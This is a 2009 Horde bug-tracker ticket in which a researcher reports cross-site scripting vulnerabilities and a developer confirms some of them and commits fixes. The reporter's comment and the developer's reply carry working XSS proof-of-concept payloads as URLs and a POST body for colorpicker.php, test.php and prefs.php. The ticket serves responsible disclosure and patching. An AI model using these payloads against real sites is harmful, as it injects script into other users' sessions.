5.3.0-git
2016-08-31

[#8399] Number preferences are not validated properly
Summary Number preferences are not validated properly
Queue Horde Base
Queue Version HEAD
Type Bug
State Resolved
Priority 2. Medium
Owners chuck (at) horde (dot) org
Requester security (at) davidwharton (dot) us
Created 2009-07-03 (2616 days ago)
Due
Updated 2009-07-11 (2608 days ago)
Assigned 2009-07-11 (2608 days ago)
Resolved 2009-07-11 (2608 days ago)
Milestone 3.3.5
Patch No

History
2009-07-11 23:40:05 Chuck Hagenbuch Comment #4
Taken from Horde DevelopersHorde Developers
State ⇒ Resolved
Reply to this comment
Fixes committed in HEAD, FW3 (3.3.5-cvs) and FW3_2 (3.2.5-cvs).
2009-07-11 21:08:06 Chuck Hagenbuch Comment #2
Assigned to Chuck Hagenbuch
Assigned to Horde DevelopersHorde Developers
Summary ⇒ Number preferences are not validated properly
State ⇒ Assigned
Version ⇒ HEAD
Milestone ⇒ 3.3.5
Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:
Horde 3.1 has been deprecated for a long time. The current stable 
version is 3.3, and we backport serious security fixes to 3.2.
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
This file doesn't exist in 3.2 or later.
This was fixed almost 2 years ago, before 3.2.0:

http://cvs.horde.org/diff.php/horde/templates/test/extensions.inc?r1=1.8&r2=1.9
POST to http://hordeserver.com/horde/services/prefs.php with the
following content:
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on



This I can actually reproduce as a problem. Patch forthcoming.
2009-07-03 18:48:49 security (at) davidwharton (dot) us Comment #1
Type ⇒ Bug
State ⇒ Unconfirmed
Priority ⇒ 2. Medium
Summary ⇒ Multiple Cross Site Scripting Vulnerabilities
Queue ⇒ Horde Base
Milestone ⇒
Patch ⇒ No
Reply to this comment
Multiple cross site scripting vulnerabilites exist.  Proof of concepts:



http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>



https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["



https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>



POST to http://hordeserver.com/horde/services/prefs.php with the 
following content:



actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on